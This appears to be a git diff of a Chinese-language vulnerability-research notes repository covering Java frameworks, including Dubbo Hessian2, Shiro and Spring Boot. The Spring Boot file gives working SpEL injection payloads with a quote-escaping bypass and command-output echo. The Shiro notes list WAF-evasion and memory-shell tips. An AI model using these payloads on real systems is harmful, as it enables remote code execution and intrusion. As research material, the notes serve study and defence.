+service:112, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) +handle:763, ServletHolder (org.eclipse.jetty.servlet) +doHandle:551, ServletHandler (org.eclipse.jetty.servlet) +nextHandle:233, ScopedHandler (org.eclipse.jetty.server.handler) +doHandle:1363, ContextHandler (org.eclipse.jetty.server.handler) +nextScope:188, ScopedHandler (org.eclipse.jetty.server.handler) +doScope:489, ServletHandler (org.eclipse.jetty.servlet) +nextScope:186, ScopedHandler (org.eclipse.jetty.server.handler) +doScope:1278, ContextHandler (org.eclipse.jetty.server.handler) +handle:141, ScopedHandler (org.eclipse.jetty.server.handler) +handle:127, HandlerWrapper (org.eclipse.jetty.server.handler) +handle:500, Server (org.eclipse.jetty.server) +lambda$handle1ドル:383, HttpChannel (org.eclipse.jetty.server) +dispatch:-1, 878842527 (org.eclipse.jetty.server.HttpChannel$$Lambda127ドル) +dispatch:547, HttpChannel (org.eclipse.jetty.server) +handle:375, HttpChannel (org.eclipse.jetty.server) +onFillable:273, HttpConnection (org.eclipse.jetty.server) +succeeded:311, AbstractConnection$ReadCallback (org.eclipse.jetty.io) +fillable:103, FillInterest (org.eclipse.jetty.io) +run:117, ChannelEndPoint2ドル (org.eclipse.jetty.io) +runJob:806, QueuedThreadPool (org.eclipse.jetty.util.thread) +run:938, QueuedThreadPool$Runner (org.eclipse.jetty.util.thread) +run:745, Thread (java.lang) +``` + diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220113130647264.png b/framework/microservice/skywalking/skywalking.assets/image-20220113130647264.png new file mode 100644 index 00000000..68f2e20a Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220113130647264.png differ 
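Review bot: in framework/microservice/skywalking/README.md the `#### 漏洞描述` heading has no body, and the set-up command `./sudo ./startup.sh` is a typo for `sudo ./startup.sh`. The analysis is the useful part and should be stated in text rather than only in screenshots: the two call stacks show the source is `GraphQLQueryHandler#doPost` and the sink is `GraphQL#parseAndValidate` handing the rejected query to `Log4jLogger#warn` (via `org.slf4j.Logger#warn(String, Object)`), which is how an attacker-controlled string reaches the log4j message and the `JndiLookup` chain below it; say that in a sentence, add the SkyWalking and log4j versions in which it is fixed, and replace the live `dnslog.cn` hostname in the request with a placeholder. Minor: both call-stack fences are tagged `java` although they are debugger stack dumps, not source, so a plain fence reads better.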
diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220113144532353.png b/framework/microservice/skywalking/skywalking.assets/image-20220113144532353.png new file mode 100644 index 00000000..6cdfa639 Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220113144532353.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220113144942928.png b/framework/microservice/skywalking/skywalking.assets/image-20220113144942928.png new file mode 100644 index 00000000..5adc106c Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220113144942928.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220113145030966.png b/framework/microservice/skywalking/skywalking.assets/image-20220113145030966.png new file mode 100644 index 00000000..b9e93976 Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220113145030966.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220113155050988.png b/framework/microservice/skywalking/skywalking.assets/image-20220113155050988.png new file mode 100644 index 00000000..fc9517a1 Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220113155050988.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220114133448365.png b/framework/microservice/skywalking/skywalking.assets/image-20220114133448365.png new file mode 100644 index 00000000..11d1b087 Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220114133448365.png differ 
diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220114140427507.png b/framework/microservice/skywalking/skywalking.assets/image-20220114140427507.png new file mode 100644 index 00000000..55d8146d Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220114140427507.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220114144223966.png b/framework/microservice/skywalking/skywalking.assets/image-20220114144223966.png new file mode 100644 index 00000000..715fe2f5 Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220114144223966.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220114152004486.png b/framework/microservice/skywalking/skywalking.assets/image-20220114152004486.png new file mode 100644 index 00000000..28b57b33 Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220114152004486.png differ diff --git a/framework/microservice/spark/README.md b/framework/microservice/spark/README.md new file mode 100644 index 00000000..39f2f092 --- /dev/null +++ b/framework/microservice/spark/README.md @@ -0,0 +1,17 @@ +前置基础 +--- + + +相关漏洞 +--- + +### Spark Shell命令注入漏洞 +> 占坑 + +- [详见](https://t.zsxq.com/IQRZrRZ) + + +在 org.apache.hadoop.fs.FileUtill 类的 unTar 方法里,用的 bash shell 命令拼接,所以可以使用命令加载恶意文件名的 tar 文件达到rce的效果。 + +![image](https://user-images.githubusercontent.com/55024146/160282134-cf0ea581-9bd5-41fe-bb0a-888b90307e19.png) + diff --git a/framework/microservice/spring cloud/function/README.md b/framework/microservice/spring cloud/function/README.md new file mode 100644 index 00000000..e8ae1955 --- /dev/null +++ b/framework/microservice/spring cloud/function/README.md 
@@ -0,0 +1,22 @@ +前置基础 +--- +**简介** + +SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。 + +相关漏洞 +--- + +### Spring Cloud Function v3.x SpEL RCE + +详细分析见 +- [Spring Cloud Function v3.x SpEL RCE](https://mp.weixin.qq.com/s/U7YJ3FttuWSOgCodVSqemg) + +**第1种利用:需要修改配置+任意路由** + +![%BHK HK{RHH0E0~1}WTWGYO](https://user-images.githubusercontent.com/55024146/160249394-794b2933-46ac-40d9-ba93-1be98207b462.png) + + +**第2种利用:默认配置+特定路由** + +![R)2817XQE4ドルO7428EPMC0II](https://user-images.githubusercontent.com/55024146/160249416-645ee796-279a-4112-9ee4-5f75f0fdf9b3.png) diff --git a/framework/microservice/spring cloud/gateway/README.md b/framework/microservice/spring cloud/gateway/README.md new file mode 100644 index 00000000..3a69a76e --- /dev/null +++ b/framework/microservice/spring cloud/gateway/README.md @@ -0,0 +1,23 @@ +相关漏洞 +--- + + +### CVE-2022-22947 SpEL Injection -> RCE + +参考 +- [Spring cloud gateway通过SPEL注入内存马](https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/) +- [表达式注入 -> RCE](https://github.com/nbxiglk0/Note/blob/master/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/Spring%20Cloud%20GateWay/CVE-2022-22947/CVE-2022-22947.md) +- https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.md + + +环境搭建 +``` +git clone https://github.com/spring-cloud/spring-cloud-gateway +cd spring-cloud-gateway +git checkout v3.1.0 +``` +创建供codeql使用的数据库 +``` +codeql database create ..\databases\spring-cloud-gateway-310 --language="java" --command="mvn clean install --file pom.xml -Dmaven.test.skip=true" +``` + diff --git a/framework/rpc/dubbo/CVE-2021-43297.md b/framework/rpc/dubbo/CVE-2021-43297.md new file mode 100644 index 00000000..8ddcfb69 --- /dev/null +++ b/framework/rpc/dubbo/CVE-2021-43297.md 
@@ -0,0 +1,196 @@ +#### 漏洞描述 + +Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击。 + +#### 漏洞复现 + +##### 环境搭建 + +https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297 + +##### 漏洞验证 + +测试效果如图: + +![image-20220118145950795](img/image-20220118145950795.png) + +#### 漏洞分析 + +**报错堆栈信息** + +![image-20220118150055029](img/image-20220118150055029.png) + +**Source** + +- com.alibaba.com.caucho.hessian.io.Hessian2Input#expect + - 隐式调用toString()方法 -> RCE + +```java + protected IOException expect(String expect, int ch) throws IOException { + if (ch < 0) { + return this.error("expected " + expect + " at end of file"); + } else { + --this._offset; + + try { + Object obj = this.readObject(); + // 隐式调用toString()方法 -> RCE + return obj != null ? this.error("expected " + expect + " at 0x" + Integer.toHexString(ch & 255) + " " + obj.getClass().getName() + " (" + obj + ")") : this.error("expected " + expect + " at 0x" + Integer.toHexString(ch & 255) + " null"); + } catch (IOException var4) { + log.log(Level.FINE, var4.toString(), var4); + return this.error("expected " + expect + " at 0x" + Integer.toHexString(ch & 255)); + } + } + } +``` + + + +**调用栈** + +```java +expect:3563, Hessian2Input (com.alibaba.com.caucho.hessian.io) +readString:1883, Hessian2Input (com.alibaba.com.caucho.hessian.io) +readUTF:90, Hessian2ObjectInput (org.apache.dubbo.common.serialize.hessian2) +decode:111, DecodeableRpcInvocation (org.apache.dubbo.rpc.protocol.dubbo) +decode:83, DecodeableRpcInvocation (org.apache.dubbo.rpc.protocol.dubbo) +decode:57, DecodeHandler (org.apache.dubbo.remoting.transport) +received:44, DecodeHandler (org.apache.dubbo.remoting.transport) +run:57, ChannelEventRunnable (org.apache.dubbo.remoting.transport.dispatcher) +runWorker:1149, ThreadPoolExecutor (java.util.concurrent) +run:624, ThreadPoolExecutor$Worker (java.util.concurrent) +run:41, InternalRunnable (org.apache.dubbo.common.threadlocal) +run:748, Thread 
(java.lang) +``` + + + +**简要分析** + +- com.alibaba.com.caucho.hessian.io.Hessian2Input#readString() + +```java + public String readString() throws IOException { + int tag = this.read(); + int ch; + switch(tag) { + case 0: + ... + case 31: + this._isLastChunk = true; + this._chunkLength = tag - 0; + this._sbuf.setLength(0); + + while((ch = this.parseChar())>= 0) { + this._sbuf.append((char)ch); + } + + return this._sbuf.toString(); + case 32: + ... + case 127: + default: + throw this.expect("string", tag); + case 48: + case 49: + case 50: + case 51: + this._isLastChunk = true; + this._chunkLength = (tag - 48) * 256 + this.read(); + this._sbuf.setLength(0); + + while((ch = this.parseChar())>= 0) { + this._sbuf.append((char)ch); + } + + return this._sbuf.toString(); + case 56: + case 57: + case 58: + case 59: + case 60: + case 61: + case 62: + case 63: + return String.valueOf((tag - 60 << 16) + 256 * this.read() + this.read()); + case 68: + return String.valueOf(this.parseDouble()); + case 70: + return "false"; + case 73: + case 89: + return String.valueOf(this.parseInt()); + case 76: + return String.valueOf(this.parseLong()); + case 78: + return null; + case 82: + case 83: + this._isLastChunk = tag == 83; + this._chunkLength = (this.read() << 8) + this.read(); + this._sbuf.setLength(0); + + while((ch = this.parseChar())>= 0) { + this._sbuf.append((char)ch); + } + + return this._sbuf.toString(); + case 84: + return "true"; + case 91: + return "0.0"; + case 92: + return "1.0"; + case 93: + return String.valueOf((byte)(this._offset < this._length ? this._buffer[this._offset++] : this.read())); + case 94: + return String.valueOf((short)(256 * this.read() + this.read())); + case 95: + ch = this.parseInt(); + return String.valueOf(0.001D * (double)ch); + case 128: + ... + case 191: + return String.valueOf(tag - 144); + case 192: + ... 
+ case 207: + return String.valueOf((tag - 200 << 8) + this.read()); + case 208: + case 209: + case 210: + case 211: + case 212: + case 213: + case 214: + case 215: + return String.valueOf((tag - 212 << 16) + 256 * this.read() + this.read()); + case 216: + ... + case 239: + return String.valueOf(tag - 224); + case 240: + ... + case 255: + return String.valueOf((tag - 248 << 8) + this.read()); + } + } +``` + +共256个case,调用`this.read()`中读取tag然后进入不同的分支 + +- com.alibaba.com.caucho.hessian.io.Hessian2Input#read() + + ```java + public final int read() throws IOException { + return this._length <= this._offset && !this.readBuffer() ? -1 : this._buffer[this._offset++] & 255; + } + ``` + + + +**构造思路** + +可见这里若想调用到`this.expect()`,则需要使流程走到`default`分支,@Longofo师傅这里通过重写客户端([详见](https://paper.seebug.org/1814/#_4))实现的。 + + diff --git a/framework/rpc/dubbo/README.md b/framework/rpc/dubbo/README.md new file mode 100644 index 00000000..b4b29511 --- /dev/null +++ b/framework/rpc/dubbo/README.md @@ -0,0 +1,4 @@ +历史漏洞 + +- [x] [CVE-2021-43297 Hessian2 反序列化](CVE-2021-43297.md) +- [ ] CVE-2021-37579 Pre-Auth Unsafe Java Deserialization \ No newline at end of file diff --git a/framework/rpc/dubbo/img/7yut5.png b/framework/rpc/dubbo/img/7yut5.png new file mode 100644 index 00000000..9ebe3868 Binary files /dev/null and b/framework/rpc/dubbo/img/7yut5.png differ diff --git a/framework/rpc/dubbo/img/image-20220104011320460.png b/framework/rpc/dubbo/img/image-20220104011320460.png new file mode 100644 index 00000000..e923782e Binary files /dev/null and b/framework/rpc/dubbo/img/image-20220104011320460.png differ diff --git a/framework/rpc/dubbo/img/image-20220118145950795.png b/framework/rpc/dubbo/img/image-20220118145950795.png new file mode 100644 index 00000000..3a2f2149 Binary files /dev/null and b/framework/rpc/dubbo/img/image-20220118145950795.png differ 
diff --git a/framework/rpc/dubbo/img/image-20220118150055029.png b/framework/rpc/dubbo/img/image-20220118150055029.png new file mode 100644 index 00000000..0b666903 Binary files /dev/null and b/framework/rpc/dubbo/img/image-20220118150055029.png differ diff --git a/framework/rpc/dubbo/img/image-20220118162819016.png b/framework/rpc/dubbo/img/image-20220118162819016.png new file mode 100644 index 00000000..31447b80 Binary files /dev/null and b/framework/rpc/dubbo/img/image-20220118162819016.png differ diff --git a/framework/security/shiro/README.md b/framework/security/shiro/README.md new file mode 100644 index 00000000..e6258712 --- /dev/null +++ b/framework/security/shiro/README.md @@ -0,0 +1,5 @@ +历史漏洞 + +- [x] CVE-2016-4437 (Shiro550) +- [ ] CVE-2019-12422 (Shiro721) + diff --git a/framework/security/shiro/img/1d55510c8cc34de68d7a8bc524dc70bf.png b/framework/security/shiro/img/1d55510c8cc34de68d7a8bc524dc70bf.png new file mode 100644 index 00000000..3c8fa796 Binary files /dev/null and b/framework/security/shiro/img/1d55510c8cc34de68d7a8bc524dc70bf.png differ diff --git a/framework/security/shiro/img/2b21b16367074384ac407365178e92e1.png b/framework/security/shiro/img/2b21b16367074384ac407365178e92e1.png new file mode 100644 index 00000000..3e8c5859 Binary files /dev/null and b/framework/security/shiro/img/2b21b16367074384ac407365178e92e1.png differ diff --git a/framework/security/shiro/img/601125e5b570489bb7e86579bb2dea6e.png b/framework/security/shiro/img/601125e5b570489bb7e86579bb2dea6e.png new file mode 100644 index 00000000..e4549de3 Binary files /dev/null and b/framework/security/shiro/img/601125e5b570489bb7e86579bb2dea6e.png differ diff --git a/framework/security/shiro/img/662a7151089b4e999ac3aecef5628e8d.png b/framework/security/shiro/img/662a7151089b4e999ac3aecef5628e8d.png new file mode 100644 index 00000000..525703d4 Binary files /dev/null and b/framework/security/shiro/img/662a7151089b4e999ac3aecef5628e8d.png differ 
diff --git a/framework/security/shiro/img/image-20211022233907942.png b/framework/security/shiro/img/image-20211022233907942.png new file mode 100644 index 00000000..0b200dff Binary files /dev/null and b/framework/security/shiro/img/image-20211022233907942.png differ diff --git a/framework/security/shiro/img/image-20211118144237427.png b/framework/security/shiro/img/image-20211118144237427.png new file mode 100644 index 00000000..7317956f Binary files /dev/null and b/framework/security/shiro/img/image-20211118144237427.png differ diff --git a/framework/security/shiro/img/image-20211118144314386.png b/framework/security/shiro/img/image-20211118144314386.png new file mode 100644 index 00000000..c94ef56d Binary files /dev/null and b/framework/security/shiro/img/image-20211118144314386.png differ diff --git a/framework/security/shiro/img/image-20211118144525625.png b/framework/security/shiro/img/image-20211118144525625.png new file mode 100644 index 00000000..292d5234 Binary files /dev/null and b/framework/security/shiro/img/image-20211118144525625.png differ diff --git a/framework/security/shiro/img/image-20211118145028082.png b/framework/security/shiro/img/image-20211118145028082.png new file mode 100644 index 00000000..89ca3e0a Binary files /dev/null and b/framework/security/shiro/img/image-20211118145028082.png differ diff --git a/framework/security/shiro/img/image-20211118145106465.png b/framework/security/shiro/img/image-20211118145106465.png new file mode 100644 index 00000000..e67f6a60 Binary files /dev/null and b/framework/security/shiro/img/image-20211118145106465.png differ diff --git a/framework/security/shiro/img/image-20211118145151098.png b/framework/security/shiro/img/image-20211118145151098.png new file mode 100644 index 00000000..3218f0ae Binary files /dev/null and b/framework/security/shiro/img/image-20211118145151098.png differ 
diff --git a/framework/security/shiro/img/image-20211118145958901.png b/framework/security/shiro/img/image-20211118145958901.png new file mode 100644 index 00000000..045df296 Binary files /dev/null and b/framework/security/shiro/img/image-20211118145958901.png differ diff --git a/framework/security/shiro/img/image-20211118150027658.png b/framework/security/shiro/img/image-20211118150027658.png new file mode 100644 index 00000000..c7dc2132 Binary files /dev/null and b/framework/security/shiro/img/image-20211118150027658.png differ diff --git a/framework/security/shiro/img/image-20211118150058675.png b/framework/security/shiro/img/image-20211118150058675.png new file mode 100644 index 00000000..fcd615d9 Binary files /dev/null and b/framework/security/shiro/img/image-20211118150058675.png differ diff --git a/framework/security/shiro/img/image-20211118150110191.png b/framework/security/shiro/img/image-20211118150110191.png new file mode 100644 index 00000000..993b8743 Binary files /dev/null and b/framework/security/shiro/img/image-20211118150110191.png differ diff --git a/framework/security/shiro/img/image-20211118150245948.png b/framework/security/shiro/img/image-20211118150245948.png new file mode 100644 index 00000000..c16e8fca Binary files /dev/null and b/framework/security/shiro/img/image-20211118150245948.png differ diff --git a/framework/security/shiro/img/image-20211118150319178.png b/framework/security/shiro/img/image-20211118150319178.png new file mode 100644 index 00000000..ed0d4287 Binary files /dev/null and b/framework/security/shiro/img/image-20211118150319178.png differ diff --git a/framework/security/shiro/img/image-20211118153223684.png b/framework/security/shiro/img/image-20211118153223684.png new file mode 100644 index 00000000..5c90a86e Binary files /dev/null and b/framework/security/shiro/img/image-20211118153223684.png differ 
diff --git a/framework/security/shiro/img/image-20211118154359697.png b/framework/security/shiro/img/image-20211118154359697.png new file mode 100644 index 00000000..3bfd9c0e Binary files /dev/null and b/framework/security/shiro/img/image-20211118154359697.png differ diff --git a/framework/security/shiro/img/image-20211118154624802.png b/framework/security/shiro/img/image-20211118154624802.png new file mode 100644 index 00000000..21eb24ec Binary files /dev/null and b/framework/security/shiro/img/image-20211118154624802.png differ diff --git a/framework/security/shiro/img/image-20211118154847035.png b/framework/security/shiro/img/image-20211118154847035.png new file mode 100644 index 00000000..81c27bb7 Binary files /dev/null and b/framework/security/shiro/img/image-20211118154847035.png differ diff --git a/framework/security/shiro/img/image-20211118154924247.png b/framework/security/shiro/img/image-20211118154924247.png new file mode 100644 index 00000000..0a5e4860 Binary files /dev/null and b/framework/security/shiro/img/image-20211118154924247.png differ diff --git a/framework/security/shiro/img/image-20211118155031602.png b/framework/security/shiro/img/image-20211118155031602.png new file mode 100644 index 00000000..50655a94 Binary files /dev/null and b/framework/security/shiro/img/image-20211118155031602.png differ diff --git a/framework/security/shiro/img/image-20211118155359227.png b/framework/security/shiro/img/image-20211118155359227.png new file mode 100644 index 00000000..990b8aaf Binary files /dev/null and b/framework/security/shiro/img/image-20211118155359227.png differ diff --git a/framework/security/shiro/img/image-20211118155853780.png b/framework/security/shiro/img/image-20211118155853780.png new file mode 100644 index 00000000..ed0d4287 Binary files /dev/null and b/framework/security/shiro/img/image-20211118155853780.png differ 
diff --git a/framework/security/shiro/img/image-20211118160532010.png b/framework/security/shiro/img/image-20211118160532010.png new file mode 100644 index 00000000..98583999 Binary files /dev/null and b/framework/security/shiro/img/image-20211118160532010.png differ diff --git "a/framework/security/shiro/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/framework/security/shiro/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..ca797856 --- /dev/null +++ "b/framework/security/shiro/345円210円251円347円224円250円347円240円224円347円251円266円.md" 
@@ -0,0 +1,93 @@ +指纹识别 +--- + +- Request 的 Cookie 不携带 `rememberMe=1` , 此时 Response 的 Set-Cookie 返回 1 个 `rememberMe=deleteMe` + +```http request +POST /shiroweb_war_exploded/login.jsp HTTP/1.1 +Host: localhost:9090 +Content-Type: application/x-www-form-urlencoded +Content-Length: 2 +Cookie: +``` +![](./img/601125e5b570489bb7e86579bb2dea6e.png) + + +- Request 的 Cookie 不携带 `rememberMe=1` , 此时 Response 的 Set-Cookie 返回 2 个 `rememberMe=deleteMe` + +```http request +POST /shiroweb_war_exploded/login.jsp HTTP/1.1 +Host: localhost:9090 +Content-Type: application/x-www-form-urlencoded +Content-Length: 2 +Cookie: rememberMe=1 +``` +![](./img/662a7151089b4e999ac3aecef5628e8d.png) + +漏洞利用 +--- +#### 回显 + +- [Java中间件通用回显方法的问题及处理 by fnmsd](https://blog.csdn.net/fnmsd/article/details/106890242) + +抄一遍, 然后塞到 CommonsBeanutils gadget 里 + +已测试中间件 +- tomcat v9 +- resin v4.0.66 + +测试效果: +![](./img/2b21b16367074384ac407365178e92e1.png) + +![](./img/1d55510c8cc34de68d7a8bc524dc70bf.png) + + + + + + +#### 内存马/代理 + + +#### 修改 Key + +- [通过代码执行修改Shiro密钥](http://www.yulegeyu.com/2021/11/19/%E9%80%9A%E8%BF%87%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E4%BF%AE%E6%94%B9Shiro%E5%AF%86%E9%92%A5/) + + +实战问题 +--- + +### Request header is too large + +解决方法: +- 修改 tomcat 的 maxHeaderSize +- 分离 payload, 字节码动态加载 +- 通过线程持久化存储 payload, 然后再触发 + - [浅谈Shiro550受Tomcat-Header长度限制影响突破](https://y4tacker.github.io/2022/04/14/year/2022/4/%E6%B5%85%E8%B0%88Shiro550%E5%8F%97Tomcat-Header%E9%95%BF%E5%BA%A6%E9%99%90%E5%88%B6%E5%BD%B1%E5%93%8D%E7%AA%81%E7%A0%B4/#0x02-%E6%B5%85%E8%B0%88%E6%96%B0%E6%80%9D%E8%B7%AF) + + +### SUID + +解决方法: +- 替换本地依赖包版本去生成 payload +- 修改字节码 + - [Modify ysoserial jar serialVersionUID](http://www.yulegeyu.com/2019/03/09/Modify-Ysoseriali-jar-serialVersionUID/) +- 自定义ClassLoader + - [使用自定义ClassLoader解决反序列化serialVesionUID不一致问题](https://gv7.me/articles/2020/deserialization-of-serialvesionuid-conflicts-using-a-custom-classloader/) + +### Unable to deserialze argument byte array + +无法利用 Commons-Collections 
3.x 版本包含 Transform 数组的 gadget + +解决方法: +- 修改 Commons-Collections 3.x 系列 gadget 通过 TemplatesImpl 加载字节码 + - [Java反序列化利用链分析之Shiro反序列化](https://www.anquanke.com/post/id/192619) +- 使用 CommonsBeanutils 系列 gadget + - [CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html) + +WAF 对抗 +--- + +> 相关案例 +- [01 shiro反序列化绕WAF之未知HTTP请求方法](https://gv7.me/articles/2021/shiro-deserialization-bypasses-waf-through-unknown-http-method/) +- [02 渗透遇shiro,看我巧绕waf](https://mp.weixin.qq.com/s/GKbE44VclJKj2PZ4Cpr_Sw) diff --git a/framework/security/spring security/README.md b/framework/security/spring security/README.md new file mode 100644 index 00000000..93cca469 --- /dev/null +++ b/framework/security/spring security/README.md @@ -0,0 +1,6 @@ +相关漏洞 + + +- [x] [CVE-2022-22978 Auth Bypass - RegexRequestMatcher](img/CVE-2022-22978.png) +- [x] [Authorization bypass again ?](auth-bypass%20again.md) + diff --git a/framework/security/spring security/auth-bypass again.md b/framework/security/spring security/auth-bypass again.md new file mode 100644 index 00000000..e2039661 --- /dev/null +++ b/framework/security/spring security/auth-bypass again.md @@ -0,0 +1,3 @@ +![image](https://user-images.githubusercontent.com/55024146/170682257-6e147037-32a8-4295-bacd-081d7279ca0e.png) + +![image](https://user-images.githubusercontent.com/55024146/170682278-9168dea6-1605-41f9-b5cd-d7afa07e9cec.png) diff --git a/framework/security/spring security/img/CVE-2022-22978.png b/framework/security/spring security/img/CVE-2022-22978.png new file mode 100644 index 00000000..98cb270c Binary files /dev/null and b/framework/security/spring security/img/CVE-2022-22978.png differ diff --git a/fileless-shell/jboss/README.md b/framework/web service/axis/README.md similarity index 100% rename from fileless-shell/jboss/README.md rename to framework/web service/axis/README.md 
diff --git a/fileless-shell/springmvc/README.md b/framework/web service/cxf/README.md similarity index 100% rename from fileless-shell/springmvc/README.md rename to framework/web service/cxf/README.md diff --git a/post-exploitation/jndi/README.md b/framework/web service/jersey/README.md similarity index 100% rename from post-exploitation/jndi/README.md rename to framework/web service/jersey/README.md diff --git a/vulnerability-analysis/tomcat/README.md b/framework/web service/wink/README.md similarity index 100% rename from vulnerability-analysis/tomcat/README.md rename to framework/web service/wink/README.md diff --git a/framework/web service/xfire/README.md b/framework/web service/xfire/README.md new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/framework/web service/xfire/README.md @@ -0,0 +1 @@ + diff --git a/framework/web/dwr/README.md b/framework/web/dwr/README.md new file mode 100644 index 00000000..36230f67 --- /dev/null +++ b/framework/web/dwr/README.md @@ -0,0 +1,6 @@ + +debug默认路径: +``` +dwr/index.html +``` +![image](https://user-images.githubusercontent.com/55024146/163032780-49b9427b-121d-4763-839a-2e3d8c0e6759.png) diff --git a/framework/web/ruoyi/README.md b/framework/web/ruoyi/README.md new file mode 100644 index 00000000..1dd20346 --- /dev/null +++ b/framework/web/ruoyi/README.md @@ -0,0 +1,7 @@ +相关漏洞 +--- + + - [01 某依rce黑名单多种bypass方法分析](https://xz.aliyun.com/t/10957) + - [02 某依后台RCE分析](https://xz.aliyun.com/t/10687) + - [03 RuoYi 可用内存马](https://xz.aliyun.com/t/10651) + - [04 若依管理后台的一些代码执行漏洞](https://xz.aliyun.com/t/10637) diff --git a/framework/web/spring boot/README.md b/framework/web/spring boot/README.md new file mode 100644 index 00000000..1baa9635 --- /dev/null +++ b/framework/web/spring boot/README.md @@ -0,0 +1,5 @@ +> attack vectors + +- https://github.com/pyn3rd/Spring-Boot-Vulnerability +- https://github.com/LandGrey/SpringBootVulExploit + 
diff --git a/framework/web/spring boot/SpringBoot 1.x Whitelabel Error Page SpEL RCE.md b/framework/web/spring boot/SpringBoot 1.x Whitelabel Error Page SpEL RCE.md new file mode 100644 index 00000000..d1ede191 --- /dev/null +++ b/framework/web/spring boot/SpringBoot 1.x Whitelabel Error Page SpEL RCE.md 
@@ -0,0 +1,84 @@ + +#### 漏洞复现 + +payload-算术表达式 +``` +id=${1011+1011} +``` +![image](https://user-images.githubusercontent.com/55024146/158839423-9045a29c-e31d-46e7-83ef-136caab0dc4a.png) + +可见表达式被成功解析 + +payload-计算器 +``` +id=${T(java.lang.Runtime).getRuntime().exec("calc")} +``` +失败,抛出异常如下 + +![image](https://user-images.githubusercontent.com/55024146/158841307-e68e7c5c-2ee7-4ca0-834d-10de59a227e6.png) + + +debug、看源码发现,在进行SpEL解析前,有以下处理 +``` +convertToReference:133, HtmlCharacterEntityReferences (org.springframework.web.util) +htmlEscape:90, HtmlUtils (org.springframework.web.util) +htmlEscape:63, HtmlUtils (org.springframework.web.util) +resolvePlaceholder:218, ErrorMvcAutoConfiguration$SpelPlaceholderResolver (org.springframework.boot.autoconfigure.web) +parseStringValue:147, PropertyPlaceholderHelper (org.springframework.util) +replacePlaceholders:126, PropertyPlaceholderHelper (org.springframework.util) +render:194, ErrorMvcAutoConfiguration$SpelView (org.springframework.boot.autoconfigure.web) +render:1244, DispatcherServlet (org.springframework.web.servlet) +processDispatchResult:1027, DispatcherServlet (org.springframework.web.servlet) +doDispatch:971, DispatcherServlet (org.springframework.web.servlet) +doService:893, DispatcherServlet (org.springframework.web.servlet) +processRequest:970, FrameworkServlet (org.springframework.web.servlet) +doPost:872, FrameworkServlet (org.springframework.web.servlet) +service:648, HttpServlet (javax.servlet.http) +service:846, FrameworkServlet (org.springframework.web.servlet) +service:729, HttpServlet (javax.servlet.http) +... 
+``` + +![image](https://user-images.githubusercontent.com/55024146/158843615-71270054-7003-4c7e-8b1d-ad041bdfd0af.png) + +对单引号、双引号、尖括号、&进行了HTML实体编码 + +![image](https://user-images.githubusercontent.com/55024146/158844001-1031b338-e458-4017-b7a4-44d9017600aa.png) + +如图,此时传入的payload中双引号已被编码,则不再符合SpEL表达式的语法,自然也就没法成功利用。 + +![image](https://user-images.githubusercontent.com/55024146/158845997-16e846c5-906f-4c00-9112-92ba85abe6b4.png) + +绕过:不出现单双引号 +> 利用String类的特性:将byte型数组转为字符串串对象 + +![image](https://user-images.githubusercontent.com/55024146/158849319-16a3c8ec-6f79-4f85-bca5-15e5b1463258.png) + +``` +id=${T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{99,97,108,99}))} +``` +![image](https://user-images.githubusercontent.com/55024146/158850107-fabff113-b042-4e4b-8efd-eb668cd844f3.png) + +测试效果 + +![image](https://user-images.githubusercontent.com/55024146/158850307-2077f252-0e4f-4972-b158-ce1821db3c1f.png) + +#### 漏洞利用 + +##### 回显 +``` +(new Scanner(Runtime.getRuntime().exec(cmd).getInputStream())).useDelimiter("\\A").next() +``` + +``` +id=${new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{119,104,111,97,109,105})).getInputStream()))} +``` +![image](https://user-images.githubusercontent.com/55024146/158853617-24cd3b1c-3f40-474b-9389-befca11d242c.png) + +##### 内存马 + +> 待完成 + + + + diff --git "a/framework/web/spring boot/SpringBoot MultipartFile.getOriginalFilename() 345円267円256円345円274円202円346円242円263円347円220円206円.md" "b/framework/web/spring boot/SpringBoot MultipartFile.getOriginalFilename() 345円267円256円345円274円202円346円242円263円347円220円206円.md" new file mode 100644 index 00000000..ec3e2c7e --- /dev/null +++ "b/framework/web/spring boot/SpringBoot MultipartFile.getOriginalFilename() 345円267円256円345円274円202円346円242円263円347円220円206円.md" 
